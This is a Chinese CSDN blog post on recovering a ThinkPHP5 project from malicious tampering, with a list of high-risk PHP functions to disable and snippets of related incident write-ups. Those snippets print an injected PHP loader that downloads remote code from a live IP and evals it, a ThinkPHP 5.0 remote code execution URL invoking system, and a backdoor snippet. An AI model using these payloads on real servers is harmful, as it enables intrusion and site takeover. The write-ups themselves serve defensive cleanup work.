解决TP5项目被恶意篡改、注入代码问题

最新推荐文章于 2023-03-17 17:12:41 发布
最新推荐文章于 2023-03-17 17:12:41 发布
阅读量7.7k 收藏 10
点赞数 1
CC 4.0 BY-SA版权
分类专栏: ThinkPHP 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39188306/article/details/94559281
本文讲述了作者经历的两次PHP项目被恶意篡改和代码注入事件,并分享了解决这些问题的方法,包括禁用高风险PHP函数、修改ThinkPHP框架App.php文件、设置文件权限以及限制服务器默认文件等措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先,谈谈这个曲折的经历!

       第一次,被人用eval()函数注入了文件,发现后,我就禁了这些PHP高危险函数!

       第二次,就是被人在入口文件中注入了代码,在public文件夹中,多出了很多文件。然后我就修改了宝塔面板的密码,加上下面的第2步,目前暂时没有被注入了,希望能帮到大家!

       如果还有更好的办法,希望不吝赐教,留下你宝贵的经验,万分感谢!

1、禁掉高危险函数:eval、phpinfo 这2个函数必须禁掉!

(1)、需禁用的函数名,如下: 
phpinfo、eval、passthru、exec、system、chroot、scandir、chgrp、chown、shell_exec、proc_open、proc_get_status、ini_alter、ini_restore、dl、pfsockopen、openlog、syslog、readlink、symlink、popepassthru、stream_socket_server、fsocket、fsockopen、putenv、create_function

(2)、下面两个可以根据项目中是否用到来决定是否禁用,如下:

error_log、ini_set

(3)、建议可禁用的函数,如下:

pcntl_alarm, pcntl_fork, pcntl_waitpid,

最低0.47元/天 解锁文章

200万优质内容无限畅学
tp5.1 token解决接口数据被篡改的安全问题
xiaoyong1110的专栏
10-30 1219
tp5.1防止接口数据被篡改解释一下上面代码: 一般使用场景:用户登录,要防止登录数据被篡改代码如下: /** * 验证token,防止数据被篡改 * @param $arr [全部请求参数] */ public function check_token($arr){ if (!isset($arr['token']) || empty($arr['token'])){ $this->info_msg('400'
MySQL数据库的SQL注入漏洞解析
最新发布
CoffeMilk的博客
09-07 1528
SQL注入总结起来就是:没有对用户输入提交的数据内容的合法性进行严格的判断或过滤,就直接将这些伪造的数据内容带入到数据库执行,导致数据泄露或损坏,甚至导致完全接管主机的一种安全漏洞。
宝塔TP5项目篡改
qq_37170740的博客
03-17 756
找到插件及对应网站开启防篡改后,会在项目.git文件夹创建2个.lock文件
tp5 webshell漏洞,文件篡改,fastadmin老版本的存在此问题解决方法
qq_41409720的博客
08-30 3464
1.首先是把攻击文件清理。 找攻击文件的方式有在静态文件目录查找后缀为 “.php”的文件就好了 2.修改tp5底层的一个漏洞: 修改第一个文件 yourpath\thinkphp\library\think\App.php 搜索 public static function module( 找到 ==》 // 获取控制器名 $controller = stri...
tp5恶意篡改项目被增加位置文件
irose的博客
07-07 1396
1.最重要的是把当前项目删掉,使用备份(因为你不知道它在你的哪个文件夹插入木马文件,最直接就是删掉) 2.然后开始做一下操作 3.可以更新框架版本 4.禁掉高危险函数:eval、phpinfo 这2个函数必须禁掉! (1)、需禁用的函数名,如下: phpinfo、eval、passthru、exec、system、chroot、scandir、chgrp、chown、shell_exec、proc_open、proc_get_status、ini_alter、ini_restore、dl、pfsockope
53天:代码审计-TP5框架及无框架变量覆盖反序列化1
08-03
函数如`include`, `include_once`, `require`, `require_once`等可能导致恶意文件被包含,攻击者可以覆盖合法文件,执行恶意代码。应避免使用动态变量作为文件路径,或者对包含的文件路径进行严格的验证和过滤。 5...
MASM驱动源代码更新:TP保护技术详解
TX保护通常与防止代码篡改相关,它可能是指一套用于检测和阻止对软件执行文件进行未授权修改的技术。TX保护能够增加软件的抗逆向工程能力,使得攻击者难以对软件进行反编译、分析或修改。在源代码级别,TX保护可能...
TP保护工具
04-03
TP工具的核心是通过修改内存、注入代码或者利用系统漏洞来避开TP系统的检测。常见的技术包括: 1. **内存篡改**:通过读写游戏进程的内存,改变游戏中的变量,例如角色的生命值、攻击力等。 2. **钩子技术**:...
关于tp5.1框架定义路由无法访问的问题以及隐藏入口文件index.php
YMB_jack的博客
08-05 1729
关于tp5.1框架定义路由无法访问的问题以及隐藏入口文件index.php
php主页劫持,基于 ThinkPHP5 的 cltphp 被搜索劫持,篡改首页的解决过程记录
weixin_34406909的博客
03-09 1018
经过对比文件:1- 攻击者会写入与原文件名类似的文件, ,内容:function s(){$contents = file_get_contents('http://67.198.186.42:29808/s/admine21.txt');a($contents);}function a($conn){$b = '';eval($b.$conn.$b);}s();?>或者$b = '';wh...
thinkphp 5.0 index.php被替换成首页内容,被注入恶意代码
weixin_34019929的博客
03-11 3748
TP项目5.0.10,近日,在登录后台时,域名/admin,跳转到网站首页。无法进入后台登录页面。然后发现,public/index.php竟然被改了。 先升级到5.0.24。还是被中枪。 后来领导查看了nginx日志。日志在 /home/wwwlogs/域名.log 发现了某个上传图片的目录下,竟然有.php文件。 192.168.100.1 - - [06/Mar/2019:14:16:...
TP5 跑路代码..
Phplayers的博客
01-08 990
跑路代码: public function test(){ $input = input(); $b = input('b'); $res = $input['a']::$b(input('c')); dump($res); } postman请求: 执行结果: \think\Db::execute(...
php被挂马,近日报网站被挂马的解决方法
weixin_29554849的博客
03-12 686
核心框架为ThinkPHP5.0版本的:在think\App类的module方法的获取控制器的代码后面加上if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }最终效果// 获取控制器名$contro...
Thinkphp5.1 ~ 5.2代码执行漏洞
公众号shadow sock7
01-16 9889
需要在library/think/Error.php中设置: error_reporting(0); http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/ 设置前(默认情况下): 设置后: payload: POST /thinkphp-5.1.29/html/public/ind...
服务器PHP配置文件php.ini被非法篡改链接到假的天极网页面
xcdm100的博客
03-08 741
服务器宝塔密码不知道如何被人知道了,后查是香港的IP地址,此人登录宝塔后,多次修改了每个版本的PHP,将配置文件php.ini文件中,用auto_append_file,添加了base64加密的php编程语句,后解密后,密文如下:
记一次挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马
weixin_30662109的博客
12-25 436
昨天发现 一台服务器突然慢了top显示几个进程100%以上的cpu使用 执行命令为 : /tmp/php -s /tmp/p2.conf 基本可以确定是被挂马了 下一步确定来源 last 没有登陆记录 先干掉这几个进程,但是几分钟之后又出现了 先看看这个木马想干什么吧 netstat看到这个木马开启了一个端口和国外的某个ip建立了连接 但是tcpdump了一小会儿 ...
记录thinkPHP5.0被挂马后的处理
weixin_30480651的博客
01-19 1041
一、thinkPHP5.0爆出getshell漏洞 http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo(); 二、通过升级thi...
记一次tp3.2.3因fetch导致的漏洞处理过程
tiancityycf的专栏
06-04 1648
参考:https://www.phpmianshi.com/?id=108 问题描述: 最近发现百度收录大幅度下降,并出现大量5xx错误,有些收录页面直接跳转到其他网站,如下图: 问题追查 1.根据以往经验首先怀疑网站被植入或者挂马 于是排查系统日志,因为php项目的植入基本是通过eval植入的,所以我们直接: grep eval nginx.log 发现类似如下日志: {"@timestamp":"02/Jun...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值